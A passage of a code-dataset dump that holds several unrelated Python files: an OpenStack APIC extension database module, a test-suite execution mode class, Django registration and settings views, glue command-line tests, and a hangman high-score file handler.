nested_domain_infra_vlan = sa.Column(sa.Integer, nullable=True)\n nested_domain_service_vlan = sa.Column(sa.Integer, nullable=True)\n nested_domain_node_network_vlan = sa.Column(sa.Integer, nullable=True)\n\n\nclass NetworkExtensionCidrDb(model_base.BASEV2):\n\n __tablename__ = 'apic_aim_network_external_cidrs'\n\n network_id = sa.Column(\n sa.String(36), sa.ForeignKey('networks.id', ondelete=\"CASCADE\"),\n primary_key=True)\n cidr = sa.Column(sa.String(64), primary_key=True)\n network = orm.relationship(models_v2.Network,\n backref=orm.backref(\n 'aim_extension_cidr_mapping', lazy='joined',\n uselist=True, cascade='delete'))\n\n\nclass NetworkExtNestedDomainAllowedVlansDb(model_base.BASEV2):\n\n __tablename__ = 'apic_aim_network_nested_domain_allowed_vlans'\n\n # There is a single pool of VLANs for an APIC\n vlan = sa.Column(sa.Integer(), primary_key=True)\n network_id = sa.Column(\n sa.String(36), sa.ForeignKey('networks.id', ondelete=\"CASCADE\"))\n network = orm.relationship(models_v2.Network,\n backref=orm.backref(\n 'aim_extension_domain_mapping',\n uselist=True,\n lazy='joined', cascade='delete'))\n\n\nclass SubnetExtensionDb(model_base.BASEV2):\n\n __tablename__ = 'apic_aim_subnet_extensions'\n\n subnet_id = sa.Column(\n sa.String(36), sa.ForeignKey('subnets.id', ondelete=\"CASCADE\"),\n primary_key=True)\n snat_host_pool = sa.Column(sa.Boolean)\n subnet = orm.relationship(models_v2.Subnet,\n backref=orm.backref(\n 'aim_extension_mapping', lazy='joined',\n uselist=False, cascade='delete'))\n\n\nclass RouterExtensionContractDb(model_base.BASEV2):\n\n __tablename__ = 'apic_aim_router_external_contracts'\n\n router_id = sa.Column(\n sa.String(36), sa.ForeignKey('routers.id', ondelete=\"CASCADE\"),\n primary_key=True)\n contract_name = sa.Column(sa.String(64), primary_key=True)\n provides = sa.Column(sa.Boolean, primary_key=True)\n\n\nclass ExtensionDbMixin(object):\n\n def _set_if_not_none(self, res_dict, res_attr, db_attr):\n if db_attr is not None:\n res_dict[res_attr] = db_attr\n\n def get_network_extn_db(self, session, network_id):\n return self.get_network_extn_db_bulk(session, [network_id]).get(\n network_id, {})\n\n def get_network_extn_db_bulk(self, session, network_ids):\n db_objs = (session.query(NetworkExtensionDb).filter(\n NetworkExtensionDb.network_id.in_(network_ids)).all())\n db_cidrs = (session.query(NetworkExtensionCidrDb).filter(\n NetworkExtensionCidrDb.network_id.in_(network_ids)).all())\n db_vlans = (session.query(\n NetworkExtNestedDomainAllowedVlansDb).filter(\n NetworkExtNestedDomainAllowedVlansDb.network_id.in_(\n network_ids)).all())\n cidrs_by_net_id = {}\n vlans_by_net_id = {}\n for db_cidr in db_cidrs:\n cidrs_by_net_id.setdefault(db_cidr.network_id, []).append(\n db_cidr)\n for db_vlan in db_vlans:\n vlans_by_net_id.setdefault(db_vlan.network_id, []).append(\n db_vlan)\n result = {}\n for db_obj in db_objs:\n net_id = db_obj.network_id\n result.setdefault(net_id, self.make_network_extn_db_conf_dict(\n db_obj, cidrs_by_net_id.get(net_id, []),\n vlans_by_net_id.get(net_id, [])))\n return result\n\n def make_network_extn_db_conf_dict(self, ext_db, db_cidrs, db_vlans):\n net_res = {}\n db_obj = ext_db\n if db_obj:\n self._set_if_not_none(net_res, cisco_apic.EXTERNAL_NETWORK,\n db_obj['external_network_dn'])\n self._set_if_not_none(net_res, cisco_apic.NAT_TYPE,\n db_obj['nat_type'])\n self._set_if_not_none(net_res, cisco_apic.SVI, db_obj['svi'])\n net_res[cisco_apic.BGP] = db_obj['bgp_enable']\n net_res[cisco_apic.BGP_TYPE] = db_obj['bgp_type']\n net_res[cisco_apic.BGP_ASN] = db_obj['bgp_asn']\n net_res[cisco_apic.NESTED_DOMAIN_NAME] = (\n db_obj['nested_domain_name'])\n net_res[cisco_apic.NESTED_DOMAIN_TYPE] = (\n db_obj['nested_domain_type'])\n net_res[cisco_apic.NESTED_DOMAIN_INFRA_VLAN] = (\n db_obj['nested_domain_infra_vlan'])\n net_res[cisco_apic.NESTED_DOMAIN_SERVICE_VLAN] = (\n db_obj['nested_domain_service_vlan'])\n net_res[cisco_apic.NESTED_DOMAIN_NODE_NETWORK_VLAN] = (\n db_obj['nested_domain_node_network_vlan'])\n net_res[cisco_apic.NESTED_DOMAIN_ALLOWED_VLANS] = [\n c.vlan for c in db_vlans]\n if net_res.get(cisco_apic.EXTERNAL_NETWORK):\n net_res[cisco_apic.EXTERNAL_CIDRS] = [c.cidr for c in db_cidrs]\n return net_res\n\n def set_network_extn_db(self, session, network_id, res_dict):\n with session.begin(subtransactions=True):\n db_obj = (session.query(NetworkExtensionDb).filter_by(\n network_id=network_id).first())\n db_obj = db_obj or NetworkExtensionDb(network_id=network_id)\n if cisco_apic.EXTERNAL_NETWORK in res_dict:\n db_obj['external_network_dn'] = (\n res_dict[cisco_apic.EXTERNAL_NETWORK])\n if cisco_apic.NAT_TYPE in res_dict:\n db_obj['nat_type'] = res_dict[cisco_apic.NAT_TYPE]\n if cisco_apic.SVI in res_dict:\n db_obj['svi'] = res_dict[cisco_apic.SVI]\n if cisco_apic.BGP in res_dict:\n db_obj['bgp_enable'] = res_dict[cisco_apic.BGP]\n if cisco_apic.BGP_TYPE in res_dict:\n db_obj['bgp_type'] = res_dict[cisco_apic.BGP_TYPE]\n if cisco_apic.BGP_ASN in res_dict:\n db_obj['bgp_asn'] = res_dict[cisco_apic.BGP_ASN]\n if cisco_apic.NESTED_DOMAIN_NAME in res_dict:\n db_obj['nested_domain_name'] = res_dict[\n cisco_apic.NESTED_DOMAIN_NAME]\n if cisco_apic.NESTED_DOMAIN_TYPE in res_dict:\n db_obj['nested_domain_type'] = res_dict[\n cisco_apic.NESTED_DOMAIN_TYPE]\n if cisco_apic.NESTED_DOMAIN_INFRA_VLAN in res_dict:\n db_obj['nested_domain_infra_vlan'] = res_dict[\n cisco_apic.NESTED_DOMAIN_INFRA_VLAN]\n if cisco_apic.NESTED_DOMAIN_SERVICE_VLAN in res_dict:\n db_obj['nested_domain_service_vlan'] = res_dict[\n cisco_apic.NESTED_DOMAIN_SERVICE_VLAN]\n if cisco_apic.NESTED_DOMAIN_NODE_NETWORK_VLAN in res_dict:\n db_obj['nested_domain_node_network_vlan'] = res_dict[\n cisco_apic.NESTED_DOMAIN_NODE_NETWORK_VLAN]\n session.add(db_obj)\n\n if cisco_apic.EXTERNAL_CIDRS in res_dict:\n self._update_list_attr(session, NetworkExtensionCidrDb, 'cidr',\n res_dict[cisco_apic.EXTERNAL_CIDRS],\n network_id=network_id)\n\n if cisco_apic.NESTED_DOMAIN_ALLOWED_VLANS in res_dict:\n self._update_list_attr(\n session, NetworkExtNestedDomainAllowedVlansDb, 'vlan',\n res_dict[cisco_apic.NESTED_DOMAIN_ALLOWED_VLANS],\n network_id=network_id)\n\n def get_network_ids_by_ext_net_dn(self, session, dn, lock_update=False):\n ids = session.query(NetworkExtensionDb.network_id).filter_by(\n external_network_dn=dn)\n if lock_update:\n ids = ids.with_lockmode('update')\n return [i[0] for i in ids]\n\n def get_network_ids_by_l3out_dn(self, session, dn, lock_update=False):\n ids = session.query(NetworkExtensionDb.network_id).filter(\n NetworkExtensionDb.external_network_dn.like(dn + \"/%\"))\n if lock_update:\n ids = ids.with_lockmode('update')\n return [i[0] for i in ids]\n\n def get_svi_network_ids_by_l3out_dn(self, session, dn, lock_update=False):\n ids = session.query(NetworkExtensionDb.network_id).filter(\n NetworkExtensionDb.external_network_dn.like(dn + \"/%\"),\n NetworkExtensionDb.svi == true())\n if lock_update:\n ids = ids.with_lockmode('update')\n return [i[0] for i in ids]\n\n def get_external_cidrs_by_ext_net_dn(self, session, dn, lock_update=False):\n ctab = NetworkExtensionCidrDb\n ntab = NetworkExtensionDb\n cidrs = session.query(ctab.cidr).join(\n ntab, ntab.network_id == ctab.network_id).filter(\n ntab.external_network_dn == dn).distinct()\n if lock_update:\n cidrs = cidrs.with_lockmode('update')\n return [c[0] for c in cidrs]\n\n def get_subnet_extn_db(self, session, subnet_id):\n db_obj = (session.query(SubnetExtensionDb).filter_by(\n subnet_id=subnet_id).first())\n result = {}\n if db_obj:\n self._set_if_not_none(result, cisco_apic.SNAT_HOST_POOL,\n db_obj['snat_host_pool'])\n return result\n\n def set_subnet_extn_db(self, session, subnet_id, res_dict):\n db_obj = (session.query(SubnetExtensionDb).filter_by(\n subnet_id=subnet_id).first())\n db_obj = db_obj or SubnetExtensionDb(subnet_id=subnet_id)\n if cisco_apic.SNAT_HOST_POOL in res_dict:\n db_obj['snat_host_pool'] = res_dict[cisco_apic.SNAT_HOST_POOL]\n session.add(db_obj)\n\n def get_router_extn_db(self, session, router_id):\n db_contracts = (session.query(RouterExtensionContractDb).filter_by(\n router_id=router_id).all())\n return {cisco_apic_l3.EXTERNAL_PROVIDED_CONTRACTS:\n [c['contract_name'] for c in db_contracts if c['provides']],\n cisco_apic_l3.EXTERNAL_CONSUMED_CONTRACTS:\n [c['contract_name'] for c in db_contracts\n if not c['provides']]}\n\n def _update_list_attr(self, session, db_model, column,\n new_values, **filters):\n if new_values is None:\n return\n rows = session.query(db_model).filter_by(**filters).all()\n new_values = set(new_values)\n for r in rows:\n if r[column] in new_values:\n new_values.discard(r[column])\n else:\n session.delete(r)\n for v in new_values:\n attr = {column: v}\n attr.update(filters)\n db_obj = db_model(**attr)\n session.add(db_obj)\n\n def set_router_extn_db(self, session, router_id, res_dict):\n with session.begin(subtransactions=True):\n if cisco_apic_l3.EXTERNAL_PROVIDED_CONTRACTS in res_dict:\n self._update_list_attr(session, RouterExtensionContractDb,\n 'contract_name',\n res_dict[cisco_apic_l3.EXTERNAL_PROVIDED_CONTRACTS],\n router_id=router_id, provides=True)\n if cisco_apic_l3.EXTERNAL_CONSUMED_CONTRACTS in res_dict:\n self._update_list_attr(session, RouterExtensionContractDb,\n 'contract_name',\n res_dict[cisco_apic_l3.EXTERNAL_CONSUMED_CONTRACTS],\n router_id=router_id, provides=False)\n","sub_path":"gbpservice/neutron/plugins/ml2plus/drivers/apic_aim/extension_db.py","file_name":"extension_db.py","file_ext":"py","file_size_in_byte":13659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"141282088","text":"\nfrom optoolbox import OpLog\nlogger = OpLog.getLogger('optest')\n\nfrom optoolbox import OpUtil\nimport TestSuite # The module, not the class...\nfrom Execution import Execution, ExecutionInfo\nfrom ExecutionSorting import ExecutionSorting\n\n_ID = 0\n\nINITIALIZE_EXECUTION_PRIORITY = -100001\nCLEANUP_EXECUTION_PRIORITY = 100001\n\ndef dummyFct():\n pass\n\nclass BaseMode:\n '''Base class for any execution mode'''\n\n def __init__(self, *args):\n self.executionList = []\n self.prepareExecutionList(*args)\n \n \n def prepareExecutionList(self, *args):\n global _ID\n \n tmpExecutionList = OpUtil.convertArgsToList(*args)\n if len(tmpExecutionList)==0:\n tmpExecutionList.append(Execution(''))\n \n for execution in tmpExecutionList:\n if execution.name:\n executionName = execution.name\n else:\n executionName = ''\n \n tReq = execution.getTargetPrerequisites()\n mReq = execution.getMatlabPrerequisites()\n dataSets = execution.getDataSets()\n \n # Note: A single test can have 0..n targets, so we pass the whole target dict to each test\n # Note: A single test can have 0..1 Matlab, so we pass a different Matlab (item in dict) to each test.\n # Note: A single test can have 0..1 dataSet, so we pass a different dataSet to each test.\n\n if len(mReq) == 0:\n if(len(dataSets) == 0):\n self.executionList.append(ExecutionInfo(_ID, execution.platform, execution.valid, executionName, tReq, None, None))\n _ID = _ID + 1\n else:\n for dataSetName, data in dataSets.iteritems():\n tmpName2 = \"{0}_{1}\".format(executionName, dataSetName)\n self.executionList.append(ExecutionInfo(_ID, execution.platform, execution.valid, tmpName2, tReq, None, data))\n _ID = _ID + 1\n else:\n for mReqName, req in mReq.iteritems():\n tmpName = \"{0}_{1}\".format(executionName, mReqName)\n if(len(dataSets) == 0):\n self.executionList.append(ExecutionInfo(_ID, execution.platform, execution.valid, tmpName, tReq, req, None))\n _ID = _ID + 1\n else:\n for dataSetName, data in dataSets.iteritems():\n tmpName2 = \"{0}_{1}\".format(tmpName, dataSetName)\n self.executionList.append(ExecutionInfo(_ID, execution.platform, execution.valid, tmpName2, tReq, req, data))\n _ID = _ID + 1\n \n\n def getExecutionList(self):\n return self.executionList\n \n \n def _createExecutionTestSuite(self, testCaseClass, testCaseNames, useInitCleanupExecutionMethod):\n '''\n Create a TestSuite and all TestCase instances for all the ExecutionInfo in the executionList attribute.\n Will create pseudo test if initializeExecution or cleanupExecution is used.\n '''\n\n # This import is not done at the module level because it would result in a circular dependency between TestCase and BaseMode.\n from TestCase import _getConfig, generateConfigKey\n\n testSuite = TestSuite.TestSuite(name=testCaseClass.__name__)\n \n for executionInfo in self.executionList:\n for testName in testCaseNames:\n \n # Determine if a loop on the test is set in the testConfig. If it is, then we must instantiate\n # Multiple TestCase instance.\n doLoopTest = False\n testConfigKey = generateConfigKey(testCaseClass.__module__, testCaseClass.__name__, testName)\n testConfig = _getConfig(testConfigKey)\n if(testConfig is not None):\n if 'loop' in testConfig:\n nbLoop = testConfig['loop']\n if nbLoop is not None and nbLoop > 1:\n doLoopTest = True\n\n if doLoopTest:\n for indexLoop in range(nbLoop):\n test = self._defineTest(testName, testCaseClass, executionInfo, indexLoop)\n testSuite.addTest(test)\n else:\n test = self._defineTest(testName, testCaseClass, executionInfo)\n testSuite.addTest(test)\n \n if useInitCleanupExecutionMethod:\n for executionInfo in self.executionList:\n if hasattr(testCaseClass, 'initializeExecution'):\n test = self._defineTest('initializeExecution', testCaseClass, executionInfo)\n test.setPriority(INITIALIZE_EXECUTION_PRIORITY)\n test.setUp = dummyFct\n test.tearDown = dummyFct\n testSuite.addTest(test)\n\n if hasattr(testCaseClass, 'cleanupExecution'):\n test = self._defineTest('cleanupExecution', testCaseClass, executionInfo)\n test.setPriority(CLEANUP_EXECUTION_PRIORITY)\n test.setUp = dummyFct\n test.tearDown = dummyFct\n testSuite.addTest(test)\n\n if self.sorting is not None:\n if self.sorting == ExecutionSorting.BY_EXECUTION_LIST:\n testSuite.sortMethod.items[10] = TestSuite.executionCmp\n elif self.sorting == ExecutionSorting.BY_TESTCASE_PRIORITY:\n testSuite.sortMethod.items[1000] = TestSuite.executionCmp\n else:\n raise Exception('No supported sorting value.')\n\n return testSuite\n\n\n def _defineTest(self, name, testCaseClass, executionInfo, indexLoop=None):\n '''Defines a single test with its prerequisites, if any.'''\n test = testCaseClass(name)\n\n if executionInfo:\n for targetName, target in executionInfo.tReq.iteritems():\n test._addTarget(targetName, target)\n \n test.dataSet = executionInfo.dataSet\n \n test.matlab = executionInfo.mReq\n\n test.executionName = executionInfo.name\n if indexLoop is not None:\n test.executionName = \"{0} LOOP {1}\".format(test.executionName, indexLoop+1)\n\n test.executionID = executionInfo.id\n\n test.executionValid = executionInfo.valid\n\n test.platform = executionInfo.platform\n\n logger.debug(\"Test instance %s created.\", test.getFullname())\n\n return test\n\n\n def _defineClassMethod(self, testSuite, testCaseClass):\n '''Create pseudo test if initialize or cleanup is used'''\n\n if hasattr(testCaseClass, 'initialize'):\n test = self._defineTest('initialize', testCaseClass, None)\n test.systemPriority = 1\n test.setUp = dummyFct\n test.tearDown = dummyFct\n testSuite.addTest(test)\n\n if hasattr(testCaseClass, 'cleanup'):\n test = self._defineTest('cleanup', testCaseClass, None)\n test.systemPriority = -1\n test.setUp = dummyFct\n test.tearDown = dummyFct\n testSuite.addTest(test)\n","sub_path":"src/optoolbox/optest/BaseMode.py","file_name":"BaseMode.py","file_ext":"py","file_size_in_byte":7323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"616081214","text":"from django.urls import reverse_lazy\nfrom django.shortcuts import render, redirect \nfrom django.contrib.auth.decorators import login_required\n\nfrom django.views.generic import CreateView, FormView\n\nfrom .models import Profile \nfrom .forms import (\n CustomUserCreationForm, \n ProfileUpdateForm, \n CustomUserUpdateForm,\n)\n\n\nclass RegisterView(CreateView):\n form_class = CustomUserCreationForm\n success_url = reverse_lazy('login')\n template_name = 'register.html'\n\n\n@login_required\ndef settings(request):\n if request.method == 'POST':\n user_form = CustomUserUpdateForm(request.POST, instance=request.user)\n profile_form = ProfileUpdateForm(request.POST, request.FILES, instance=request.user.profile)\n if user_form.is_valid() and profile_form.is_valid():\n user_form.save()\n profile_form.save()\n return redirect('twitter')\n else:\n user_form = CustomUserUpdateForm(instance=request.user)\n profile_form = ProfileUpdateForm(instance=request.user.profile)\n\n context = {'user_form': user_form, 'profile_form': profile_form}\n return render(request, 'profile_update.html', context)","sub_path":"users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"536043063","text":"from __future__ import absolute_import, division, print_function\n\nimport os\nimport pytest\nfrom mock import patch\n\nfrom glue.tests.helpers import requires_qt\n\nfrom ..core import Data\nfrom ..main import (die_on_error, restore_session, load_data_files,\n main, start_glue)\n\n\n@requires_qt\ndef test_die_on_error_exception():\n \"\"\"Decorator should spawn a QMessageBox and exit\"\"\"\n with pytest.raises(SystemExit):\n with patch('qtpy.QtWidgets.QMessageBox') as qmb:\n @die_on_error('test_msg')\n def test():\n raise Exception()\n test()\n assert qmb.call_count == 1\n\n\ndef test_die_on_error_noexception():\n \"\"\"Decorator should have no effect\"\"\"\n @die_on_error('test_msg')\n def test():\n return 0\n assert test() == 0\n\n\ndef test_load_data_files():\n with patch('glue.core.data_factories.load_data') as ld:\n ld.return_value = Data()\n dc = load_data_files(['test.py'])\n assert len(dc) == 1\n\n\ndef check_main(cmd, glue, config, data):\n \"\"\"Pass command to main program, check for expected parsing\"\"\"\n with patch('glue.main.start_glue') as sg:\n main(cmd.split())\n args, kwargs = sg.call_args\n assert kwargs.get('datafiles', None) == data\n assert kwargs.get('gluefile', None) == glue\n assert kwargs.get('config', None) == config\n\n\ndef check_exec(cmd, pyfile):\n \"\"\"Assert that main correctly dispatches to execute_script\"\"\"\n with patch('glue.main.execute_script') as es:\n main(cmd.split())\n args, kwargs = es.call_args\n assert args[0] == pyfile\n\n\ndef test_main_single_data():\n check_main('glueqt test.fits', None, None, ['test.fits'])\n\n\ndef test_main_multi_data():\n check_main('glueqt test.fits t2.csv', None, None, ['test.fits', 't2.csv'])\n\n\ndef test_main_config():\n check_main('glueqt -c config.py', None, 'config.py', None)\n\n\ndef test_main_glu_arg():\n check_main('glueqt -g test.glu', 'test.glu', None, None)\n\n\ndef test_main_auto_glu():\n check_main('glueqt test.glu', 'test.glu', None, None)\n\n\ndef test_main_many_args():\n check_main('glueqt -c config.py data.fits d2.csv', None,\n 'config.py', ['data.fits', 'd2.csv'])\n\n\ndef test_exec():\n check_exec('glueqt -x test.py', 'test.py')\n\n\ndef test_auto_exec():\n check_exec('glueqt test.py', 'test.py')\n\n\n@requires_qt\ndef test_exec_real(tmpdir):\n # Actually test the script execution functionlity\n filename = tmpdir.join('test.py').strpath\n with open(filename, 'w') as f:\n f.write('a = 1')\n with patch('qtpy.QtWidgets.QMessageBox') as qmb:\n with patch('sys.exit') as exit:\n main('glue -x {0}'.format(os.path.abspath(filename)).split())\n assert exit.called_once_with(0)\n\n\n@pytest.mark.parametrize(('cmd'), ['glueqt -g test.glu test.fits',\n 'glueqt -g test.py test.fits',\n 'glueqt -x test.py -g test.glu',\n 'glueqt -x test.py -c test.py',\n 'glueqt -x',\n 'glueqt -g',\n 'glueqt -c'])\ndef test_invalid(cmd):\n with pytest.raises(SystemExit):\n main(cmd.split())\n\n\n@requires_qt\n@pytest.mark.parametrize(('glue', 'config', 'data'),\n [('test.glu', None, None),\n (None, 'test.py', None),\n (None, None, ['test.fits']),\n (None, None, ['a.fits', 'b.fits']),\n (None, 'test.py', ['a.fits'])])\ndef test_start(glue, config, data):\n with patch('glue.main.restore_session') as rs:\n with patch('glue.config.load_configuration') as lc:\n with patch('glue.main.load_data_files') as ldf:\n with patch('glue.app.qt.GlueApplication') as ga:\n with patch('qtpy.QtWidgets') as qt:\n\n rs.return_value = ga\n ldf.return_value = Data()\n\n start_glue(glue, config, data)\n if glue:\n rs.assert_called_once_with(glue)\n if config:\n lc.assert_called_once_with(search_path=[config])\n if data:\n ldf.assert_called_once_with(data)\n","sub_path":"glue/tests/test_main.py","file_name":"test_main.py","file_ext":"py","file_size_in_byte":4393,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"} +{"seq_id":"548393275","text":"import random\n\n\n''' The basic idea of calculating the final score:\n wordLength x 2 - strikes '''\n\n\ndef calculateScore(rightAnswer, strikes):\n print(\"Calculating the score\")\n totalScore = (len(rightAnswer) * 2) - strikes\n return totalScore\n\n\ndef saveTotalScore(isFriendGame, playerName, totalScore, rightAnswer):\n print(\"Saving total score\")\n # This is how you are and read txt-files\n if (isFriendGame):\n hScoreList = open('highScoresFriend.txt', 'a')\n hScoreList.write(\n \"player_name:\" + playerName + \"%total_score:\" + str(\n totalScore) + \"%guessed_word:\" + rightAnswer + \"%\" + \"\\n\")\n hScoreList.close() # you can omit in most cases as the destructor will call if\n else:\n hScoreList = open('highScoresUniverse.txt', 'a')\n hScoreList.write(\"player_name:\" + playerName + \"%total_score:\" + str(\n totalScore) + \"%guessed_word:\" + rightAnswer + \"%\" + \"\\n\")\n hScoreList.close() # you can omit in most cases as the destructor will call if\n\n\n # f = open('test.txt', 'r')\n # content = f.readlines()\n # f.close() # you can omit in most cases as the destructor will call if\n # print(\"TXT FILE CONTENT\")\n # print(content)'\n\n\ndef readAndRankHighScores(gameMode):\n if (gameMode == \"friend\"):\n scoreList = open('highScoresFriend.txt').read().splitlines()\n randomRow = random.choice(scoreList).upper()\n return randomRow\n else:\n scoreList = open('highScoresUniverse.txt').read().splitlines()\n randomRow = random.choice(scoreList).upper()\n return randomRow\n\n\ndef getAllScores(gameMode):\n if (gameMode == \"friend\"):\n scoreList = open('highScoresFriend.txt').read().splitlines()\n else:\n scoreList = open('highScoresUniverse.txt').read().splitlines()\n\n allColonsList = []\n allPercentsList = []\n\n # STOP if there are no records of high scores\n if (scoreList):\n # Lets find all \":\" indeces and put them into a list\n for s in scoreList:\n allColonsList.append(list(find_all(s, \":\")))\n\n # Lets find all \"%\" indeces and put them into a list\n for s in scoreList:\n allPercentsList.append(list(find_all(s, \"%\")))\n\n # Lets find all correct values (name, score, word) and put them into a list\n rowValuesList = []\n scoreListRowCounter = 0\n for s in scoreList:\n colonRowCounter = 0\n colons = allColonsList[scoreListRowCounter]\n percents = allPercentsList[scoreListRowCounter]\n valuesList = []\n for i in colons:\n colonItem = colons[colonRowCounter]\n percentItem = percents[colonRowCounter]\n value = s[colonItem + 1:percentItem]\n valuesList.append(value)\n colonRowCounter += 1\n\n rowValuesList.append(valuesList)\n scoreListRowCounter += 1\n\n # Now the values are there correctly, now the list needs to be sorted by score\n rowValuesList = sorted(rowValuesList, key=lambda x: int(x[1]), reverse=True)\n return rowValuesList\n\n\ndef find_all(a_str, sub):\n start = 0\n while True:\n start = a_str.find(sub, start)\n if start == -1: return\n yield start\n start += len(sub) # use start += 1 to find overlapping matches","sub_path":"HangScores.py","file_name":"HangScores.py","file_ext":"py","file_size_in_byte":3380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"62"}